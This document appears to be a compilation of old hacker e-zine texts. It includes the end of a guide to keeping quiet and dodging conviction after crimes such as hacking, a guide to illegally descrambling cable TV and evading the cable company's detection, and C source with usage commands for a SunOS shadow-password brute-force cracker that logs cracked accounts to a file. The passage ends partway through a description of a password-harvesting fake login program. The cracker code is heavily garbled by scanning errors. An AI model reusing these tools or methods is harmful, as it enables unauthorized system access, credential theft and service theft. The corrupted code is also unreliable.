right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT 
OF LAW." 


Nice ring to it, hmm? The only words coming out of your mouth 
at this point should be "I’d like to speak to my attorney, please" 
and, if applicable in your area, "I’d like to make a phone call, 
please" (remember the "please’s," see part #1 above). Nothing
else. There are tape recorders, video cameras, PLUS the word of a
dozen police officers to back it all up. How’s that for an array 
of damning evidence against you? 


Then, after the ride downtown, you’ll be booked and probably
asked a few questions. Say nothing. You’re probably pissing your
pants with fear at this point, and may be tempted to roll over on
everyone you ever shook hands with in your whole life, but keep
your calm, and KEEP QUIET. Keep asking for your attorney and/or a 
phone call, no matter WHAT threats/deals/etc. they make to you. 
Remember, they can’t legally interrogate you without your attorney 
present. You may also be tempted to show your mettle at this 
point, and give them false information, but remember one thing: If 
you lie to them, you can be convicted of perjury (a nasty offense 
itself). The best policy here is NSA: Never Say Anything. 
Remember, you never have to keep track of what you’ve said, or have 
to worry about having it used against you, if you’ve said NOTHING. 


--- Part 5: The Trial


Here, we’ll assume you’ve been arrested, booked, let out on 
bail, indicted on X counts of so-and-so, etc. You’re now in the 
system. CARDINAL RULE #3: Get the best criminal defense attorney 
you can afford, preferably one with some background in the crime 
you’ve committed. No, scratch that: make that the best criminal 
defense attorney, PERIOD. It’s a helluva lot better to spend 5 
years working at McDonald’s 12 hours a day to pay back your legal 
fee, than it is to spend 5 years in the slammer getting pimped out 
nightly for a pack of menthols. Also, pay attention during the 
trial. Remember, the defense attorney is working for YOU: it’s
YOUR life they’re deciding, so give him every bit of information
and help you can. You’re paying him to sort it out for you, but
you should still keep an eye on things: if, in the middle of a
trial, something happens (you get a killer idea, or want to jump up
and scream "BULLSHIT!"), TELL HIM! It very well might be useful!
Also, have him nitpick every single thing for loopholes,
technicalities, civil rights violations, etc. It’s worth it if it
pays off.


Another important thing is to look good. Image is everything.
Although you might prefer to wear heavily stained rock-band T-
shirts, leather jackets, ratty jeans, etc. in real life, that will
be EXTREMELY damning in the eyes of the judge/jury. They say that
clothes make the man, and in this case it’s REALLY true: get a
suit, comb/cut your hair, shave, etc. Make yourself look like a
"positively respectable darling" in the eyes of the court! It’ll
pay off for you. (hey, it worked for Eric and Lyle Menendez)


--- Part 8: The Prison


If you’re here, you’re totally fucked. Unless, by divine 
intervention, your conviction is overturned on appeal, you’d better 
clear up the next 5 years on your calendar. Apparently, you didn’t 
read closely enough, so read this every day during your long stay 
in prison, and you’ll be better equipped next time (assuming there 
IS a next time..... :) 


Remember the cardinal rules: 1) Don’t leave evidence around
to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best 
attorney available. If you remember these, and exercise some common 
sense and a lot of caution, you should have no problem handling any 
legal problems that come up. 




Note: This is intended to be used as a handbook for defense 
from minor crimes ONLY (hacking, DWI, etc.) If you’re a career 
criminal, or you’ve murdered or raped somebody, you’re scum, and at 
least have the grace to plead "guilty". Don’t waste the tax- 
payers’ time and money with fancy legal footwork. 


Please feel free to add anything or correct this document.
However, if you DO add or correct something, PLEASE make sure it’s
true, and PLEASE email me the changes so I can include them in the next
revision of the document. My address is pstlb@acad3.alaska.edu. Happy
hacking to all, and if this helps you avoid getting caught, so much the
better. :)


/* A Guide to Porno Boxes */
/* by Carl Corey */


Keeping with tradition, and seeing that this is the first article in
Phrack on cable TV descrambling, any illegal box for use in descrambling
cable television signals is now known as a PORNO BOX.


There are many methods that cable companies use to ensure that you get
what you pay for - and _only_ what you pay for. Of course, there are
always methods to get ’more than you pay for’. This file will discuss
the most important aspects of these methods, with pointers to more
detailed information, including schematics and resellers of equipment.


Part I. How the cable company keeps you from getting signals 
A brief history 


---Older Systems---


Most scrambling methods are, in theory, simple. The original method
used to block out signals was the trap method. All traps remove signals
that are sent from the CATV head end (the CATV company’s station). The
first method, which is rarely used anymore, was the negative trap.
Basically, every point where the line was dropped had these traps, which
removed the pay stations from your signal. If you decided to add a pay
station, the company would come out and remove the trap. This method was
pretty secure - you would provide physical evidence of tampering if you
climbed the pole to remove them or alter them (sticking a pin through
them seemed to work randomly, but could affect other channels, as it
shifts the frequency the trap removes.) This was a very secure system,
but did not allow for PPV or other services, and required a lot of
physical labor (pole-climbers aren’t cheap). The only place this is
used anymore is in an old apartment building, as one trip can service
several programming changes. Look for a big gray box in the basement
with a lot of coax going out. If you are going to give yourself free
service, give some random others free service to hide the trail.


The next method used was termed a positive trap. With this method, the 
cable company sends a _very_ strong signal above the real signal. A 
tuner sees the strong signal, and locks onto the ’garbage’ signal. A 
loud beeping and static lines would show up on the set. For the CATV 
company to enable a station, they put a ’positive’ trap on the line, 
which (despite the name) removes the garbage signal. Many text files 
have been around on how to descramble this method (overlooking the 
obvious, buying a (cheap) notch filter), ranging from making a crude 
variable trap, to adding wires to the cable signal randomly to remove the 
signal. This system is hardly used anymore, as you could just put a trap
inside your house, which wouldn’t be noticed outside the house. 


---Current Systems---


The next advent in technology was the box. The discussion of different 
boxes follows, but there is one rather new technology which should be 
discussed with the traps. The addressable trap is the CATV’s dream. It 
combines the best features of the negative trap (very difficult to tamper 
with without leaving evidence) with features of addressable boxes (no 
lineman needs to go out to add a service, computers can process Pay Per 
View or other services). Basically, a ’smart trap’ sits on the pole and
removes signals at will. Many systems require a small amp inside the
house, which the cable company uses to make sure that you don’t hook up
more than one TV. I believe that the new CATV act makes this illegal, 
and that a customer does not have to pay for any extra sets (which do not 
need equipment) in the house. Of course, we all know that the cable TV 
company will do whatever it wants until it is threatened with lawsuits. 


Cable boxes use many different methods of descrambling. Most are not in 
use anymore, with a few still around, and a few around the corner in the 
future. The big thing to remember is sync suppression. This method is 
how the cable companies make the picture look like a really fucked up, 
waving Dali painting. Presently the most popular method is the Tri-mode 
In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10 
dB. The sync can be changed randomly once per field, and the information 
necessary for the box to rebuild a sync signal. This very common system 
is discussed in Radio-Electronics magazine in the 2/87 issue. There are
schematics and much more detailed theory than is provided here. 


The other common method currently used is SSAVI, which is most common on
Zenith boxes. It stands for Sync Suppression And Video Inversion. In
addition to sync suppression, it uses video inversion to also ’scramble’
the video. There is no sync signal transmitted separately (or reference
signal to tell the box how to de-scramble) as the first 26 lines (blank,
above the picture) are not de-synched, and can be re-synched with a
phased lock loop - giving sync to the whole field. The data on inversion
is sent somewhere in the 20 or 21st line, which is outside of the
screen. Audio can be scrambled too, but it is actually just moved to a
different frequency. Radio Electronics August 92 on has circuits and
other info in the Drawing Board column.


---Future Systems---


For Pioneer, the future is now. The system the new Pioneers use is 
patented and Pioneer doesn’t want you to know how it works. From the 
patent, it appears to use combinations of in-band, out-band, and keys 
(also sending false keys) to scramble and relay info necessary to 
descramble. These boxes are damn slick. The relevant patents are US 
#5,113,411 and US #4,149,158 if you care to look. There is not much 
information to be gained from them. Look for future updates to this 
article with info on the system if I can find any :) 


Other systems are the VideoCipher + (used on satellites now - this is 
scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are 
similar, with Digi encrypting the video with DES also (yikes)... And 
they all use changing keys and other methods. Oak Sigma converters use
similar methods which are available now on cable. (digital encryption of
audio, etc...) 


Part II. How the cable company catches you getting those signals 


There are many methods the CATV company can use to catch you, or at 
least keep you from using certain methods. 


Market Code: Almost _all_ addressable decoders now use a market code. 
This is part of the serial number (which is used for pay 
per view addressing) which decodes to a general geographic 
region. Most boxes contain code which tell it to shut 
down if it receives a code (which can be going to any box 
on the cable system) which is from a different market area. 
So if you buy a converter that is say, market-coded for 
Los Angeles, you won’t be able to use it in New York. 


Bullets: The bullet is a shut down code like above - it will make
your box say ’bAh’ and die. The method used most is for
the head end to send messages to every box they know of
saying ’ignore the next shutdown message’ ... and once
every (legit) box has this info, it sends the bullet.
The only boxes that actually process the bullet are ones
which the CATV system doesn’t know about. P.S. Don’t
call the cable company and complain about cable if you
are using an illegal converter - and be sure to warn
anyone you live with about calling the CATV co. also.


Leak Detection: The FCC forces all cable companies to drive around and 
look for leaks - any poor splice jobs (wiring your house 
from a neighbors without sealing it up nice) and some 
descramblers will emit RF. So while the CATV is looking 
for the leaks, they may catch you. 


Free T-Shirts: The cable company can, with most boxes, tell the box to 
display a different signal. So they can tell every box 
they know of (the legit box pool) to display a commercial 
on another channel, while the pirate boxes get this real 
cool ad with an 1800 number for free t-shirts... you call, 
you get busted. This is mostly done during PPV boxing or 
other events which are paid for - as the company knows 
exactly who should get that signal, and can catch even 
legit boxes which are modified to receive the fight. 


Your Pals: Programs like "Turn in a cable pirate and get $100" let 
you know who your friends _really_ are. 


Part III: How to get away with it. 


I get a lot of questions about opening a box that you own. This is not 
a good idea. Most, if not ALL boxes today have a tamper sensor. If you 
open the box, you break a tab, flip a switch, etc... This disables the 
box and leaves a nice piece of evidence for the CATV co. to show that you 
played with it. 


I also have had questions about the old "unplug the box when it is 
enabled, then plug it back in later"... The CATV company periodically 
sends a signal to update all the boxes to where they should be. If you 
want to do this, you’ll need to find out where the CATV sends the address 
information, and then you need to trap it out of the signal. So as soon 
as the fraudulent customer (let’s call him Chris) sees his box get the 
signal to receive the PPV porn channel, he installs the trap and now his 
box will never get any pay per view signals again... but he’ll always 
have whatever he was viewing at the time he put the trap in. Big problem 
here is that most _newer_ systems also tell the box how long it can 
descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3 
hours have passed"... 


Where to make/buy/get porno boxes: 


You can order a box which has been modified not to accept bullets. This 
method is pretty expensive. You can also get a ’pan’ descrambler - it is 
a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and 
descrambles it. These boxes can’t be killed by the bullets, and work 
pretty well. There are some pans which are made by the same company as 
your cable box and are sensitive to bullets, so beware. 


There are two basic ideas for modifying a box (provided you get detailed 
instructions on how to get it open, or how to fix it once you open it). 
You can change the S/N to something which is known as ’universal’ or 
disassemble the code and remove the jump to the shutdown code. 

The universal codes are rare, and may be extinct. Besides, if the cable 
company finds out your code, they can nuke it. This happens when someone 
who makes (err made) ’universal’ chips gets busted. The modification of 
the actual code is the best way to do it, just forcing a positive 
response to permission checks is the easiest way. 


A ’cube’ is not a NeXT, it’s a device which removes the data signal from 
the cable line, and inserts a ’nice’ data signal which tells your box to 
turn everything on. A ’destructive’ cube actually re-programs all the 
boxes below it to a new serial number and gives that number full 


Disclaimer 


The following text is for educational purposes only and I strongly suggest 
that it is not used for malicious purposes....yeah right! 


Introduction 


Ok, I decided to release this phile to help out all you guys who wish to 
start hacking unix. Although these programs should compile & run 
on your system if you follow the instructions I have given, knowing a bit 
of C will come in handy if things go wrong. Other docs I suggest you read 
are older ’phrack’ issues with Shooting Shark’s various articles on unix, 
and of course, ’Unix from the ground up’ by The Prophet. 


This article includes three programs, a SUNOS Brute force Shadow password 
file cracker, The Ultimate Login Spoof, and a Unix Account Validator. 


Shadow Crack 


SUNOS Unix brute force shadow password file cracker 


Well, a while back, I saw an article in phrack which included a brute force 
password cracker for unix. This was a nice idea, except that these days 
more and more systems are moving towards the shadow password scheme. This, 
for those of you who are new to unix, involves storing the actual encrypted 
passwords in a different file, usually only accessible to root. A typical 
entry from a System V R4 password file looks like this :- 


root:x:0:1:Sys. admin:/:/bin/sh 


with the actual encrypted password replaced by an ’x’ in the /etc/passwd 
file. The encrypted password is stored in a file (in the case of sysV) 
called /etc/shadow which has roughly the following format :- 


root:XyfgFekj95Fpq::::: 


this includes the login i.d., the encrypted password, and various other 
fields which hold info on password ageing etc...(no entry in the other 
fields indicates they are disabled). 


Now this was fine as long as we stayed away from system V’s, but now a 
whole load of other companies have jumped on the bandwagon from IBM (aix) 
to Sun’s SUNOS systems. The system I will be dealing with is SUNOS’s 
shadowed system. Now, like sysV, SUNOS also has a system whereby the 
actual encrypted passwords are stored in a file usually called 
/etc/security/passwd.adjunct, and normally this is accessible only by root. 
This rules out the use of brute force crackers, like the one in phrack 
quite a while back, and also modern day programs like CRACK. A typical 
/etc/passwd file entry on shadowed SUNOS systems looks like this :- 


root:##root:0:1:System Administrator:/:/bin/csh 


with the ’shadow’ password file taking roughly the same format as that of 
Sys V, usually with some extra fields. 
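
The field conventions described above, turned into a defender's audit (an added example, not part of the original article): it classifies the password field of each passwd-style line and counts the entries that have no password or still expose a crypt() hash to every user. The function names and the sample entries, built from the formats quoted above, are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* State of the password field (2nd ':'-separated field) of one passwd line. */
enum pw_state {
    PW_MALFORMED,    /* fewer than two ':' separators, or line too long */
    PW_EMPTY,        /* empty field: the account has no password */
    PW_SHADOW_SYSV,  /* "x": hash is kept in /etc/shadow */
    PW_SHADOW_SUNOS, /* "##name": hash is kept in passwd.adjunct */
    PW_HASH_EXPOSED, /* 13-character crypt() hash readable by every user */
    PW_OTHER,        /* anything else, e.g. "*" or a NIS +/- entry */
    PW_STATES        /* number of states, used to size the counters */
};

/* Constructed sample input; the hash string is the placeholder quoted above. */
static const char SAMPLE_PASSWD[] =
    "root:##root:0:1:System Administrator:/:/bin/csh\n"
    "sync::1:1::/:/bin/sync\n"
    "daemon:*:1:1::/:\n"
    "guest:XyfgFekj95Fpq:100:10:Guest:/home/guest:/bin/sh\n"
    "admin:x:0:1:Sys. admin:/:/bin/sh\n";

/* Traditional crypt() output uses only the alphabet [./0-9A-Za-z]. */
static int is_crypt_char(char c)
{
    return c == '.' || c == '/' || (c >= '0' && c <= '9') ||
           (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
}

enum pw_state classify_passwd_line(const char *line)
{
    const char *pw, *end;
    size_t len, i;

    /* NIS compat include/exclude entries are not local accounts. */
    if (line[0] == '+' || line[0] == '-')
        return PW_OTHER;

    pw = strchr(line, ':');
    if (pw == NULL)
        return PW_MALFORMED;
    pw++;                               /* first byte of the password field */
    end = strchr(pw, ':');
    if (end == NULL)
        return PW_MALFORMED;
    len = (size_t)(end - pw);

    if (len == 0)
        return PW_EMPTY;
    if (len == 1 && pw[0] == 'x')
        return PW_SHADOW_SYSV;
    if (len > 2 && pw[0] == '#' && pw[1] == '#')
        return PW_SHADOW_SUNOS;
    if (len == 13) {
        for (i = 0; i < len; i++)
            if (!is_crypt_char(pw[i]))
                return PW_OTHER;
        return PW_HASH_EXPOSED;
    }
    return PW_OTHER;
}

/* Classify every line of text, fill counts[], and return the number of
   entries that need attention (empty password or exposed hash). */
int audit_passwd(const char *text, int counts[PW_STATES])
{
    char line[512];
    int risky = 0;

    memset(counts, 0, PW_STATES * sizeof counts[0]);
    while (*text != '\0') {
        size_t n = strcspn(text, "\n");
        if (n >= sizeof line) {
            counts[PW_MALFORMED]++;     /* refuse to guess at overlong lines */
        } else if (n > 0) {
            enum pw_state s;
            memcpy(line, text, n);
            line[n] = '\0';
            s = classify_passwd_line(line);
            counts[s]++;
            if (s == PW_EMPTY || s == PW_HASH_EXPOSED)
                risky++;
        }
        text += n;
        if (*text == '\n')
            text++;
    }
    return risky;
}

int main(void)
{
    int counts[PW_STATES];
    int risky = audit_passwd(SAMPLE_PASSWD, counts);

    printf("empty passwords: %d\n", counts[PW_EMPTY]);
    printf("exposed hashes:  %d\n", counts[PW_HASH_EXPOSED]);
    printf("shadowed:        %d\n",
           counts[PW_SHADOW_SYSV] + counts[PW_SHADOW_SUNOS]);
    return risky ? 1 : 0;
}
```
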


So we cannot use a program like CRACK. However, SUNOS also supplies a 
function called pwdauth(), which basically takes two arguments, a login 
name and decrypted password. The password is then encrypted and compared 
to the appropriate entry in the shadow file; if it matches, we have a valid 
i.d. & password, if not, we don’t. 


I therefore decided to write a program which would exploit this function, 
and could be used to get valid i.d’s and passwords even on a shadowed 
system! 


To my knowledge the use of the pwdauth() function is not logged, but I could 
be wrong. I have left it running for a while on the system I use and it has 
attracted no attention, and the administrator knows his shit. I have seen 
the functions getspwent() and getspwnam() in Sys V to manipulate the 
shadow password file, but not a function like pwdauth() that will actually 
validate the i.d. and password. If such a function does exist on other 
shadowed systems then this program could be very easily modified to work 
without problems. 


The only real beef I have about this program is that because the 
pwdauth() function uses the standard unix crypt() function to encrypt the 
supplied password, it is very slow!!! Even in burst mode, a password file 
with 1000’s of users could take a while to get through. My advice is 
to run it in the background and direct all its screen output to /dev/null 
like so :- 


shcrack -mf -uroot -ddict1 > /dev/null & 


Then you can log out then come back and check on it later! 


The program works in a number of modes, all of which I will describe below, 
is command line driven, and can be used to crack both multiple accounts in 
the password file and single accounts specified. It is also NIS/NFS (Sun 
Yellow Pages) compatible. 


How to use it 


shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file] 


Usage :- 


-m[mode] there are 3 modes of operation :- 


-mb Burst mode, this scans the password file, trying the minimum number 
of password guessing strategies on every account. 


-mi Mini-burst mode, this also scans the password file, and tries most 
password guessing strategies on every account. 


-mf Brute-force mode, tries all password strategies, including the use 
of words from a dictionary, on a single account specified. 


more about these modes in a sec, the other options are :- 
-p[password file] This is the password file you wish to use, if this is 
left unspecified, the default is /etc/passwd. 
NB: The program automatically detects and uses the 
password file wherever it may be in NIS/NFS systems. 


-u[user id] The login i.d. of the account you wish to crack, this is used 
in Brute-force single user mode. 


-d[dict file] This uses the words in a dictionary file to generate 
possible passwords for use in single user brute force 
mode. If no filename is specified, the program only uses the 
password guessing strategies without using the dictionary. 


Modes 




-mb Burst mode basically gets each account from the appropriate password 
file and uses two methods to guess its password. Firstly, it uses the 
account name as a password, this name is then reversed and tried as a 
possible password. This may seem like a weak strategy, but remember, 
the users’ passwords are already shadowed, and therefore are deemed to 
be secure. This can lead to sloppy passwords being used, and I have 
come across many cases where the user has used his/her i.d. as a 
password. 


-mi Mini-burst mode uses a number of other password generating methods 
as well as the 2 listed in burst mode. One of the methods involves 
taking the login i.d. of the account being cracked, and appending the 
numbers 0 to 9 to the end of it to generate possible passwords. If 
this mode has no luck, it then uses the account’s gecos ‘comment’ 
information from the password file, splitting it into words and 
trying these as passwords. Each word from the comment field is also 
reversed and tried as a possible password. 


-mf Brute-force single user mode uses all the above techniques for password 
guessing as well as using a dictionary file to provide possible 
passwords to crack a single account specified. If no dictionary filename 
is given, this mode operates on the single account using the 
same methods as mini-burst mode, without the dictionary. 


Using shadow crack 


To get program help from the command line just type :- 


$ shcrack <RETURN> 


which will show you all the modes of operation. 


If you wanted to crack just the account ‘root’, located in 
/etc/passwd (or elsewhere on NFS/NIS systems), using all methods 
including a dictionary file called ’dict1’, you would do :- 


$ shcrack -mf -uroot -ddict1 


to do the above without using the dictionary file, do :- 


$ shcrack -mf -uroot 


or to do the above but in password file ’miner’ do :- 


$ shcrack -mf -pminer -uroot 


to start cracking all accounts in /etc/passwd, using minimum password 
strategies do :- 


$ shcrack -mb 


to do the above but on a password file called ’miner’ in your home 
directory do :- 


$ shcrack -mb -pminer 


to start cracking all accounts in ’miner’, using all strategies except 
dictionary words do :- 


$ shcrack -mi -pminer 


ok, heres the code, ANSI C Compilers only :- 


cut here 

/* Program : Shadow Crack 
Author : (c)1994 The Shining/UPi (UK Division) 
Date : Released 12/4/94 


Unix type : SUNOS Shadowed systems only */ 


include <stdio.h> 
include <pwd.h> 

include <string.h> 
include <ctype.h> 
#include <signal.h> 


define WORDSIZE 20 /* Maximum word size */ 
define OUTFILE "data" /* File to store cracked account info */ 


Gl 


void word_strat( void ), do_dict( void ); 

void add_nums( char * ), do_comment( char * ); 

void try_word( char * ), reverse_word( char * ); 

void find_mode( void ), burst_mode( void ); 

void mini_burst( void ), brute_force( void ); 

void user_info( void ), write _details( char * ); 

void pwfile_name( void ), disable_interrupts( void ), cleanup(); 


char *logname, *comment, *homedir, *shell, *dict, *mode, 
*pwfile, *pwdauth(); 

struct passwd *getpwnam(), *pwentry; 

extern char *optarg; 

int option, uid, gid; 


int main( int argc, char **argv ) 
{ 

disable_interrupts(); 
system("clear"); 


if (argc < 2) { 


printf ("Shadow Crack - (c)1994 The Shining\n"); 
printf ("SUNOS Shadow password brute force cracker\n\n"); 
printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]); 
printf ("-d[dictfile]\n\n\n"); 

( 


printf("{b] is burst mode, scans pwfile trying minimum\n"); 
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prince (" password strategies on all i.d’s\n\n"); 

printf("[i] is mini-burst mode, scans pwfile trying both\n") ; 
printf£(" userid, gecos info, and numbers to all i.d’s\n\n"); 
printf("({f] is bruteforce mode, tries all above stategies\n"); 
printt(" as well as dictionary words\n\n"); 

printf ("[pwfile] Uses the password file [pwfile], default\n"); 
printf (" is /etc/passwd\n\n"); 

printf("{loginid] Account you wish to crack, used with\n"); 
printf (" -mf bruteforce mode only\n\n"); 

printf ("[dictfile] uses dictionary file [dictfile] to\n"); 
printf (" generate passwords when used with\n"); 
printf (" -mf bruteforce mode only\n\n"); 

exit (0); 


/* Get options from the command line and store them in different 
variables */ 


while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF) 
switch (option) 


{ 


case /m’: 
mode = optarg; 
break; 

case 'p’: 
pwfile = optarg; 
break; 

case ’u’: 
logname = optarg; 
break; 

case ’d’: 
dict = optarg; 
break; 

default: 
printf ("wrong options\n"); 
break; 


} 


find_mode(); 
} 


/* Routine to redirect interrupts */ 


void disable_interrupts( void ) 

{ 

signal (SIGHUP, SIG_IGN); 
signal (SIGTSTP, cleanup) 
signal (SIGINT, cleanup) ; 
signal (SIGQUIT, cleanup) 

signal (SIGTERM, cleanup); 

} 


/* If CTRL-Z or CTRL-C is pressed, clean up & quit */ 


void cleanup( void ) 


{ 
FILE *£p; 


if ((fp = fopen("gecos", "r")) != NULL) 
remove ("gecos") ; 
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if ((fp = fopen("data", "r")) == NULL) 
printf("\nNo accounts cracked\n") ; 


printf ("Quitting\n"); 
exit (0); 
} 


/* Function to decide which mode is being used and call appropriate 
routine */ 


void find_mode( void ) 


{ 


if (strcmp(mode, "b") == NULL) 
burst_mode(); 

else 

if (strcemp(mode, "i") == NULL) 
mini_burst(); 

else 

if (strcmp(mode, "f") == NULL) 
brute_force(); 

else 


printf("Sorry - No such mode\n"); 
exit (0); 


/* Get a users information from the password file */ 


void user_info( void ) 

{ 
uid = pwentry->pw_uid; 
gid = pwentry->pw_gid,; 

comment = pwentry->pw_gecos; 

homedir = pwentry->pw_dir; 
shell = pwentry->pw_shell; 

} 


/* Set the filename of the password file to be used, default is 
/etc/passwd */ 


void pwfile_name( void ) 

{ 

if (pwfile != NULL) 
setpwfile(pwfile); 


/* Burst mode, tries user i.d. & then reverses it as possible passwords 
on every account found in the password file */ 


void burst_mode( void ) 
{ 

pwfile_name(); 
setpwent (); 


while ((pwentry = getpwent()) != (struct passwd *) NULL) 
{ 


logname = pwentry->pw_name; 
user_info(); 

try_word( logname ); 
reverse_word( logname ); 
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endpwent (); 
} 


/* Mini-burst mode, try above combinations as well as other strategies 
which include adding numbers to the end of the user i.d. to generate 
passwords or using the comment field information in the password 
file */ 


void mini_burst( void ) 
{ 

pwfile_name(); 
setpwent (); 


while ((pwentry = getpwent()) != (struct passwd *) NULL) 
{ 


logname = pwentry->pw_name; 
user_info(); 
word_strat(); 


} 


endpwent (); 
} 


/* Brute force mode, uses all the above strategies as well using a 
dictionary file to generate possible passwords */ 


void brute_force( void ) 
{ 

pwfile_name(); 
setpwent (); 


if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) { 
printf ("Sorry - User unknown\n"); 
exit (0); 

} 

else 


{ 
user_info(); 
word_strat(); 
do_dict(); 
} 


endpwent (); 
} 


/* Calls the various password guessing strategies */ 


void word_strat () 
{ 
try_word( logname ); 
reverse_word( logname ); 
add_nums( logname ); 
do_comment ( comment ); 


/* Takes the user name as its argument and then generates possible 
passwords by adding the numbers 0-9 to the end. If the username 
is greater than 7 characters, don’t bother */ 


void add_nums( char *wd ) 

{ 

Tafitte. 45 

char temp[2], buff [WORDSTIZI 


GJ 
pear 
~ 
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if (strlen(wd) < 8) { 


for (i = 0; i < 10; i++) 
{ 
strcpy (buff, wd); 
sprintf(temp, "Sd", i); 
strcat (wd, temp); 
try_word( wd ); 
strcpy (wd, buff); 


/* Gets info from the ’gecos’ comment field in the password file, 
then process this information generating possible passwords from it */ 


void do_comment( char *wd ) 


{ 
FILE *f£p; 


char temp[2], buff [WORDSTIZI 
Int. Cc, flag; 


GI 
pan 
~ 


flag = 0; 


/* Open file & store users gecos information in it. wt mode 
allows us to write to it & then read from it. */ 


if ((fp = fopen("gecos", "wt")) == NULL) { 
printf("Error writing gecos info\n"); 
exit (0); 


fprintf(fp, "%Ss\n", wd); 
rewind (fp); 


strcpy (buff, ""); 


/* Process users gecos information, separate words by checking for the 
','’ field separater or a space. */ 


while ((c = fgetc(fp)) != EOF) 


TE OCse PS ae ew Ce So yy af 

sprintf(temp, "Sc", c); 
strncat (buff, temp, 1); 

} 


else 
flag. = 1; 
if ((isspace(c)) || (c == '’,’) != NULL) { 
if (flag == 1) { 


c=fgetc(fp); 
if ((isspace(c)) || (iscntrl(c) == NULL)) 
ungetc(c, fp); 
} 


try_word (buff); 
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reverse_word (buff); 
strcpy (buff, ""); 
flag = 0; 
strcpy(temp, ""); 
} 


} 
fclose(fp); 
remove ("gecos"); 


} 


/* Takes a string of characters as its argument (in this case the 
i.d., and then reverses it */ 


void reverse_word( char *wd ) 
{ 

char temp[2], buff [WORDSTIZI 
Ante 1; 


Gl 


li 


i = strlen(wd) + 1; 


strcpy(temp, ""); 
strcpy (buff, ""); 
do 
{ 
ae 
if ((isalnum(wd[i]) || (ispunct (wd[i]))) != NULL) { 


sprintf(temp, "%c", wd[il]); 
strncat (buff, temp, 1); 
} 


} while(i != 0); 


if (strlen(buff) > 1) 
try_word (buff); 


/* Read one word at a time from the specified dictionary for use 
as possible passwords, if dictionary filename is NULL, ignore 
this operation */ 


void do_dict( void ) 


{ 


FILE *fp; 
char buff[WORDSIZE], temp[2]; 
int.-cy 
strcpy (buff, ""); 
strcpy (temp, ""); 
if (dict == NULL) 
exit (0); 
if ((fp = fopen(dict, "r")) == NULL) { 
printf("Error opening dictionary file\n"); 
exit (0); 


} 


rewind (fp); 


while ((c = fgetc(fp)) != EOF) 
{ 




tf ((e ta HY Pl fecha or \nh))y 4 
strcpy(temp, ""); 
sprintf(temp, "Sc", c); 
strncat (buff, temp, 1); 
} 


if (c == ’\n’) { 
if (butt [0] t=" *) 
try_word (buff); 


strcpy (buff, ""); 
} 
} 


fclose(fp); 
} 


/* Process the word to be used as a password by stripping \n from 
it if necessary, then use the pwdauth() function, with the login 
name and word to attempt to get a valid id & password */ 


void try_word( char pw[] ) 
{ 

int pwstat, i, pwlength; 
char temp[2], buff [WORDSTIZI 


GJ 
pe 
x 


strcpy (buff, ""); 
pwlength = strlen(pw); 


for (i = 0; i != pwlength; i++) 

{ 

if (pw[i] != ’\n’) { 
strcpy(temp, ""); 


sprintf (temp, "Sc", pw[lil]l); 
strncat (buff, temp, 1); 


if (strlen(buff) > 3) { 
printf("Trying : s\n", buff); 


if (pwstat = pwdauth(logname, buff) == NULL) { 
printf("Valid Password! - writing details to ’data’\n"); 


write details (buff); 


if (strcmp (mode, "f") == NULL) 
exit (0); 


/* If valid account & password, store this, along with the accounts 
uid, gid, comment, homedir & shell in a file called '’data’ */ 


void write_details( char *pw ) 
{ 
FILE *fp; 


if ((fp = fopen(OUTFILE, "a")) == NULL) { 
printf("Error opening output file\n"); 
exit (0); 
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fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); 
fprintf(fp, "%Ss:%3s:%s\n", comment, homedir, shell); 
fclose (fp); 

} 


cut here 


again to compile it do :- 


$ gcc shcrack.c -o shcrack 


or 


$ acc shcrack.c -o shcrack 


this can vary depending on your compiler. 


The Ultimate Login Spoof 




Well this subject has been covered many times before but it’s a while since 
I have seen a good one, and anyway I thought other unix spoofs have had two 
main problems :- 


1) They were pretty easy to detect when running 
2) They recorded any old shit entered..... 


Well now I feel these problems have been solved with the spoof below. 
Firstly, I want to say that no matter how many times spoofing is deemed as 
a ‘lame’ activity, I think it is very underestimated. 


When writing this I have considered every possible feature such a program 
should have. The main ones are :- 


1) To validate the entered login i.d. by searching for it in the 
password file. 


2) Once validated, to get all information about the account entered 
including - real name etc from the comment field, homedir info 
(e.g. /homedir/miner) and the shell the account is using and 
store all this in a file. 


3) To keep the spoof’s tty idle time to 0, thus not to arouse the 
administrator’s suspicions. 


4) To validate passwords before storing them, on all unshadowed unix systems 
& SUNOS shadowed/unshadowed systems. 


5) To emulate the ’sync’ dummy account, thus making it act like the 
real login program. 


6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically 
quit if it has not grabbed an account within a specified time. 


7) To automatically detect & display the hostname before the login prompt 
e.g. ’ccu login:’, this feature can be disabled if desired. 


8) To run continuously until a valid i.d. & valid password are entered. 


As well as the above features, I also added a few more to make the spoof 
’foolproof’. At university, a lot of the users have been ’stung’ by 
login spoofs in the past, and so have become very conscious about security. 


For example, they now try and get around spoofs by entering any old crap when 
prompted for their login name, or to hit return a few times, to prevent any 
‘crappy’ spoofs which may be running. This is where my spoof shines! 
Firstly, if someone was to enter - 


login: dhfhfhfhryr 
Password: 


into the spoof, it checks to see if the login i.d. entered is 
valid by searching for it in the password file. If it exists, the 
spoof then tries to validate the password. If both the i.d. & password 
are valid, these will be stored in a file called .data, along with 
additional information about the account taken directly from the password 
file. 


Now if, as in the case above, either the login name or password is 
incorrect, the information is discarded, and the login spoof runs again, 
waiting for a valid user i.d. & password to be entered. 


Also, a lot of systems these days have an unpassworded account called 
’sync’, which when logged onto, usually displays the date & time the 
sync account was last logged into, and from which server or tty, 
the message of the day, syncs the disk, and then logs you straight out. 


A few people have decided that the best way to dodge login spoofs is to 
first login to this account then when they are automatically logged out, 
to login to their own account. 


They do this firstly, so that if a spoof is running it only records the 
details of the sync account and secondly the spoof would not act as the 
normal unix login program would, and therefore they would spot it and report 
it, thus landing you in the shit with the system administrator. 


However, I got around this problem so that when someone 
